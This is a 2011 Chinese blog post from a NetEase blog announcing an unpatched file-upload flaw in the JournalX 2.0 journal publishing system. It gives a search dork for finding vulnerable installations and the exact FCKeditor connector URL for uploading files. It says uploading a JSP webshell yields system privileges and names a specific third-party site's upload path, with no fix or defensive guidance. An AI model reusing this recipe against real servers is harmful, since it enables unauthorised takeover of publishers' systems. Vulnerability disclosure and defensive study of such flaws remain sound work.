注册 登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

小猪太子--网易博客

关注网络安全,低调求发展。

 
 
 

日志

 
 
关于我

看起来没什么新鲜的,其貌不扬,个头一般,没獠牙,呼吸空气,肋下没逆鳞,吃的是碳水化合物,看构造变形的可能性也不大,人畜无害的家伙。

Journal报刊系统Fckeditor-0day  

2011-09-13 23:53:09|  分类: 漏洞播报 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

影响版本:JournalX 2.0  
官方网站:http://www.magtech.com.cn

产品介绍:

JournalX 2.0率先为出版社/集团、期刊业推出了整体的解决方案。目前已经在遍布全国的600多家杂志社、十几家出版社得到应用。

google or baidu 关键字:inurl:volumn/current_abs.shtml

因FCKeditor/myconfig.js 过滤不严格导致上传任意格式文件。

在Web根目录访问 /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector      上传JSP马 = 系统权限。

上传后访问路径:http://www.dgjunyue.com/ UserFiles/File/ 马的名字.jsp

  评论这张
 
阅读(580)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018